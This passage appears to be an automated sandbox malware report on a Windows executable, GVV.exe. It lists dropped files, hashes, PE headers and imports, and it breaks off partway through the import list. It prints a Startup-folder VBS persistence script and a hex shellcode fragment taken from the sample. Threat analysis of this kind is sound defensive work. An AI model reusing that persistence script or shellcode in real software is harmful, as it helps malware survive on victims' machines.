              Preview:EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...

              C:\Users\user\AppData\Local\Temp\autEA6E.tmp

              Download File
              Process:C:\Users\user\Desktop\GVV.exe
              File Type:data
              Category:dropped
              Size (bytes):415558
              Entropy (8bit):7.980802161270596
              Encrypted:false
              SSDEEP:6144:B5V2kSfdEVJBkA8liRllAjk0/5F2m0SDEHPTmXWbdChTm+1hEDubJUoztcl8cC2h:rYkS1KWA8SbZ0F24gRsp1mD27tcy+
              MD5:6167A7957E72F9B3A53C5667A7C56057
              SHA1:00AC978BFF6FA30F4429ECD8810460642C5767B0
              SHA-256:26939E2779D04E0E5CC020694B7EAF38525FD40E13E06DB165C08449A13FA347
              SHA-512:0D705C994C7405358EB5531A5A19CC8A1EC1CCF2E25D76CAA2C7A368DA474FC1E65B688E79F1D978B079057B99B9D43D3954AAFD32553276CE0595B12C366CF8
              Malicious:false
              Preview:EA06.........b.5.R..nO:.J.V+Up..i..M...U*h...P...Z..+U.?.w4.O.q|M........V.8..h..=..9.Nf.Z_..P....j...B......(.....:8......_4X.LCm.m.Q*E.a..i'..6...r*..|sa.F......x-.9.....l...U.a.t.......<...;.H.r!..N..&.s..J.7.O....{...2.d,...3.4..1.X..3K.H........G.....gJ...U@..uf....o?.R....^.N.-.7.M*iH..;.....6...J.^.I..@..}*j.....i6....X.mf..$.m!..iUz.p.......;...:...q.........i_..j..... ._.=..V(@..7.L..@....SP...5B..g...M].Md....iJ.L..~..b.7.O.5Y.Vm6...)NUJ.L..x....?...B....l..\"..-6.4...........1Q..j.......%6i6.........t.V..i]N......@.i.V)....b....r...y.......(.<R&@...*5D..d...c-l.-:...(.x.W..>8..............EH..2*..;Z../si.O._!......I.p..z.......>+...<`X%f.5..6V{}>km.......4..x`...7.N&4..JO...+.).*...L~...~.....I.&.s..P*.j....oP.z...W#.X.cI.Rf..."....6Q*E2k\...sn...7.@.*f2.....K.*i0..#.....7.[._=U..h.x&.I.D.i..-Ri.7ez..5...2.I.3^.2.5.Z1?:d^;W.igSJUr.I.R.TKuf....4.P...E.Z; .M..j.R....B...@iSJ.J...w#V.b+..R...5....kUy...q.w#...*'.....gwsE.M...>i..X

              C:\Users\user\AppData\Local\Temp\autEACD.tmp

              Download File
              Process:C:\Users\user\Desktop\GVV.exe
              File Type:data
              Category:dropped
              Size (bytes):9916
              Entropy (8bit):7.600038819371061
              Encrypted:false
              SSDEEP:192:m+cKumbG02JtWU+F6xcj8DiqAEgADXuLKZRvVE8ZGD/Lr6mjNAEOLiX:97umbGRJtWjAuYipVkX2KZ/E8ZGD/XVf
              MD5:85EC07A5B813744D5460158A4F4C3B75
              SHA1:9A40D20BD37344BB771FA10D81E813397AEA3B90
              SHA-256:64B6B2C25F3830B385DC1E421742721FA60298892200EDF21BCC1DE44C9DDEFC
              SHA-512:0D591CF85239BC1E138DBE0A877F26FABB2EE5924BEA0195488FF7816DFDCEB2D6EF5A864A424004C82671EC57F41C455A774822A7A3D75341B44B5AD7A3099C
              Malicious:false
              Preview:EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...

              C:\Users\user\AppData\Local\Temp\disturb

              Download File
              Process:C:\Users\user\Desktop\GVV.exe
              File Type:data
              Category:dropped
              Size (bytes):494592
              Entropy (8bit):7.519227488221947
              Encrypted:false
              SSDEEP:12288:21RC4HwaoZnJX1NpLh7MvRh+cnz3LbsUsVLLYn:d4zaJXdLh7gkcnzcZW
              MD5:1C497907667183BDB5AEFBAF2BB74A28
              SHA1:8DFD33CDF0751BBC78FB0F96799416CA6A06FB2E
              SHA-256:5DD4707D740D281210F4F9F7756E054F87D90B6DB0C4DB0D6F65E42210C6E441
              SHA-512:A37581C9BCA68617F3653CC5F35A41A00F9F8CB6BAC55C55C2A206E3AEEC2C8E02CAAC1C23C1337D9402F38F06EC0472B22094BFCB0D1A28A8701E4A35E03F19
              Malicious:false
              Preview:.n.ZTXL50J46..JJ.XZWXL54.4661JJ4XZWXL54J4661JJ4XZWXL54J4661JZ5XZYG.;4.=...K..y.?1?.D8[QDP'jW94978.V/.DC_j#Zx...lX[.Q.;<@n4XZWXL58..~.4|..)...J.R.Hj..J.<q&...4.P.O...&...2|.J.l#4..$...Jf..H..5F..)...K ..Hp..J...&...4A..O...'v..2.`J...4...%...Kf#W^~.44XZWXL54J4661JJ4..WX.43Jo..TJJ4XZWXL.4H5=7?JJF]ZWNN54J46.xIJ4HZWX.04J4v61ZJ4XXWXI55J4661OJ5XZWXL5.B4621JJ4XZUXL.4J$66!JJ4XJWX\54J466!JJ4XZWXL54J..01NK4XZ._L.~J4661JJ4XZWXL54J466.MJ.cZW..34r4661JJ4XZWXL54J4661..2XBWXLM.L4v61JJ4XZWXL54.16.5JJ4XZWXL54J4661JJ4XZWXL54J.BSI>J4X/&]L5$J46D4JJ0XZWXL54J4661JJ.XZ7v>QU>U66.3K4X.RXLO5J4@31JJ4XZWXL54J4v61.dP9.6XL5p.466!MJ4VZWX.34J4661JJ4XZWX.54..BZBJJ4XSWXL5DM4641JJ.^ZWXL54J4661JJtXZ.v+S].G66.HJ4X.PXL14J4611JJ4XZWXL54J4v61.dF+(4XL5..466.MJ4.ZWXH24J4661JJ4XZWX.54..DS]%)4X.lXL5.M46.1JJd_ZWXL54J4661JJtXZ.XL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J

              C:\Users\user\AppData\Local\Temp\proximobuccal

              Download File
              Process:C:\Users\user\Desktop\GVV.exe
              File Type:ASCII text, with very long lines (29744), with no line terminators
              Category:dropped
              Size (bytes):29744
              Entropy (8bit):3.547357781785406
              Encrypted:false
              SSDEEP:768:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNb2E+Ix24vfF3if6gy6rE:wiTZ+2QoioGRk6ZklputwjpjBkCiw2Rl
              MD5:34F0F69B281BEFD351CFD575548C405E
              SHA1:BF1A53BE845395604BA157EF73ECC2881B5D59BB
              SHA-256:D59EE71397DCB4366353F472260A6178C00A79DD50562E440B4E8CB26090EEF9
              SHA-512:020C19E4CF6DEF3A80BC65257263D00BC365A90871B3E3EA90B02CD25B53F83FC081DA2443778ED9FDF11407E3F9BB6C2EED6343AB2CB414EAE84167F68B8686
              Malicious:false
              Preview:048B4C24088B008B093BC8760483C8FFC31BC0F7D8C38B0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c00000066

              C:\Users\user\AppData\Local\silvexes\deblaterate.exe

              Download File
              Process:C:\Users\user\Desktop\GVV.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):116712960
              Entropy (8bit):7.9996147912630144
              Encrypted:true
              SSDEEP:393216:O3dRRpERafh/JijmNabDYE4Z51CbfRz9e8f+oj+X89vHez17pFDu6uWjNAl9fB5K:O5Jp3qgpDX6l9YOoWb3VP3ChIPwaE
              MD5:67B3857DEE4F4219F088B87902BFF4B0
              SHA1:BAB4083E3728D86834B4E3D7E471294C070F0AB9
              SHA-256:F0A5BEA34655560A7D3DB32ABECDE11185B6424AE95F8375AB91DEF91426AE65
              SHA-512:77F907F0DD7894E97DAE480A43A4E1D85D3F3B32E286370EAB58D3E45DD9FDDC8A7CF8F5361B2C0C423DA2239B6298AAE5E1959AF013323FFD92013DDAD6F6F3
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L....b3f.........."..........6......w.............@..........................@............@...@.......@.....................d...|....@..D{.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...D{...@...|..................@..@.reloc...u.......v...p..............@..B........................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs

              Download File
              Process:C:\Users\user\AppData\Local\silvexes\deblaterate.exe
              File Type:data
              Category:dropped
              Size (bytes):286
              Entropy (8bit):3.37023866098958
              Encrypted:false
              SSDEEP:6:DMM8lfm3OOQdUfclzXUEZ+lX1WlMg6DIAnriIM8lfQVn:DsO+vNlDQ1vgEPmA2n
              MD5:44F3E839A1990F835FB83D6211427B16
              SHA1:497F4D458DE63028582B4366D4D3DD13F36620D4
              SHA-256:CCCD137E79E511883B63E4E4CECDDE0AF8A60283CEC1C1B7D327346D99073E49
              SHA-512:E8759644E1D4941F0C1680946356E80F2620A797A993E52D1018377CD2D3D079E437AC3FB5A0354CDC1E776CA50AC244C4A086DEC1DC664B703297BE7B0926CA
              Malicious:true
              Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.s.i.l.v.e.x.e.s.\.d.e.b.l.a.t.e.r.a.t.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

              C:\Users\user\AppData\Roaming\logs.dat

              Download File
              Process:C:\Windows\SysWOW64\svchost.exe
              File Type:data
              Category:dropped
              Size (bytes):288
              Entropy (8bit):7.23939860202269
              Encrypted:false
              SSDEEP:6:u5J530FDTaWJFP2U5Z7wqxJRhnlNTJdRcuExpSy7JFH3ggINkP:2330F7JFPv5+qxJHnlBL2uEx08MrkP
              MD5:19E2694A14A9EC567FB5E94FC4239A5E
              SHA1:CC440919BF546F39B7422C5193764F8B68181EB0
              SHA-256:20F34F3B24DD8ABF1D50D0099C57F38FA3034F36E46CB10EEFAE11B164229B4A
              SHA-512:B7325AB7A0CDF28E84EAF542952033BD73A3F0388A54AC6AE9EDA3121B96DB823F7CDA01C8FE51F08D7F094453558D05256533708DC55C230383ECCDB543F053
              Malicious:false
              Preview:.D{6............x.X"..`...Y.N.xv..2E....).....X5.q..i5&....mO..b....R....hV...5.r.M.z.C..@j.g.#....FPc..-r..[!........]........._.c......{.).......V.-.P.*.sdv...%;&..e.....I......@R.....Z.G..B.6+Z..zz.&........)...QUI.&...t.......`,.......\1+R....^.....A...."./,.>`.....(..*..

              C:\Windows\appcompat\Programs\Amcache.hve

              Download File
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):1835008
              Entropy (8bit):4.469392039413486
              Encrypted:false
              SSDEEP:6144:XzZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuNWjDH5S:DZHtYZWOKnMM6bFp0j4
              MD5:F1E21314CC90BF487BD4841E07BFEBC5
              SHA1:406075C87F2E8EF6D13FDAB88F9CB3FF6F89D561
              SHA-256:FF98034A43B8BEB2616820F87C28C8AD808AF45D0BF60846D3F12C8ACF0F8376
              SHA-512:0DDFF38EA320CE81081324582DD783BAF6F931C39224B9A4AC94440922BE7FB24F7C6A2F3430C96059789DCE5743ED89EE74DC5622FDDB2D2602680BF11105DE
              Malicious:false
              Preview:regfI...I....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.L"...................................................................................................................................................................................................................................................................................................................................................5<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):7.252987156080183
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:GVV.exe
              File size:1'369'600 bytes
              MD5:fa3641c75d2beb68c01e8065eefc4707
              SHA1:1a2f7c3bb7190f8d8e1685e4e1fd77ebecc699ba
              SHA256:e28c8fc4052dbd472cc6245f605064f85ebb36371b43246066fdbeca547cbd17
              SHA512:6624af74d2f22e87fd2e2acee58d15cda54a7888567c9625b7cedf481008144b54e52668d3ed65df46ed04d8ea59fc308d5db6e9805d20b0c8b0278c81a19c0f
              SSDEEP:24576:GqDEvCTbMWu7rQYlBQcBiT6rprG8aRMWJLRH4NnPncMw:GTvC/MTQYxsWR7aRLNHWPp
              TLSH:FA55C00273D1D022FFAB92334B5AF6115BBC6A260123E61F13981D79BE705B1563E7A3
              File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

              File Icon

              Icon Hash:aaf3e3e3938382a0

              Static PE Info

              General

              Entrypoint:0x420577
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
              Time Stamp:0x66336200 [Thu May 2 09:50:56 2024 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:948cc502fe9226992dce9417f952fce3

              Entrypoint Preview

              Instruction
              call 00007F0EBD5617B3h
              jmp 00007F0EBD5610BFh
              push ebp
              mov ebp, esp
              push esi
              push dword ptr [ebp+08h]
              mov esi, ecx
              call 00007F0EBD56129Dh
              mov dword ptr [esi], 0049FDF0h
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              and dword ptr [ecx+04h], 00000000h
              mov eax, ecx
              and dword ptr [ecx+08h], 00000000h
              mov dword ptr [ecx+04h], 0049FDF8h
              mov dword ptr [ecx], 0049FDF0h
              ret
              push ebp
              mov ebp, esp
              push esi
              push dword ptr [ebp+08h]
              mov esi, ecx
              call 00007F0EBD56126Ah
              mov dword ptr [esi], 0049FE0Ch
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              and dword ptr [ecx+04h], 00000000h
              mov eax, ecx
              and dword ptr [ecx+08h], 00000000h
              mov dword ptr [ecx+04h], 0049FE14h
              mov dword ptr [ecx], 0049FE0Ch
              ret
              push ebp
              mov ebp, esp
              push esi
              mov esi, ecx
              lea eax, dword ptr [esi+04h]
              mov dword ptr [esi], 0049FDD0h
              and dword ptr [eax], 00000000h
              and dword ptr [eax+04h], 00000000h
              push eax
              mov eax, dword ptr [ebp+08h]
              add eax, 04h
              push eax
              call 00007F0EBD563E5Dh
              pop ecx
              pop ecx
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              lea eax, dword ptr [ecx+04h]
              mov dword ptr [ecx], 0049FDD0h
              push eax
              call 00007F0EBD563EA8h
              pop ecx
              ret
              push ebp
              mov ebp, esp
              push esi
              mov esi, ecx
              lea eax, dword ptr [esi+04h]
              mov dword ptr [esi], 0049FDD0h
              push eax
              call 00007F0EBD563E91h
              test byte ptr [ebp+08h], 00000001h
              pop ecx

              Rich Headers

              Programming Language:
              • [ C ] VS2008 SP1 build 30729
              • [IMP] VS2008 SP1 build 30729

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x77b44.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x14c0000x7594.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0xd40000x77b440x77c00a3c94159b2ab5e18e773c6c73155ac9dFalse0.9466662317327766data7.934055930890062IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x14c0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_ICON0xd44a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
              RT_ICON0xd45c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
              RT_ICON0xd48b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
              RT_ICON0xd49d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
              RT_ICON0xd58800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
              RT_ICON0xd61280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
              RT_ICON0xd66900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
              RT_ICON0xd8c380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
              RT_ICON0xd9ce00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
              RT_STRING0xda1480x594dataEnglishGreat Britain0.3333333333333333
              RT_STRING0xda6dc0x68adataEnglishGreat Britain0.2735961768219833
              RT_STRING0xdad680x490dataEnglishGreat Britain0.3715753424657534
              RT_STRING0xdb1f80x5fcdataEnglishGreat Britain0.3087467362924282
              RT_STRING0xdb7f40x65cdataEnglishGreat Britain0.34336609336609336
              RT_STRING0xdbe500x466dataEnglishGreat Britain0.3605683836589698
              RT_STRING0xdc2b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
              RT_RCDATA0xdc4100x6f1acdata1.0003208198925913
              RT_GROUP_ICON0x14b5bc0x76dataEnglishGreat Britain0.6610169491525424
              RT_GROUP_ICON0x14b6340x14dataEnglishGreat Britain1.15
              RT_VERSION0x14b6480x10cdataEnglishGreat Britain0.5932835820895522
              RT_MANIFEST0x14b7540x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

              Imports

              DLLImport
              WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
              VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
              COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
              MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
              WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
              PSAPI.DLLGetProcessMemoryInfo
              IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
              USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
              UxTheme.dllIsThemeActive
              KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
              USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, 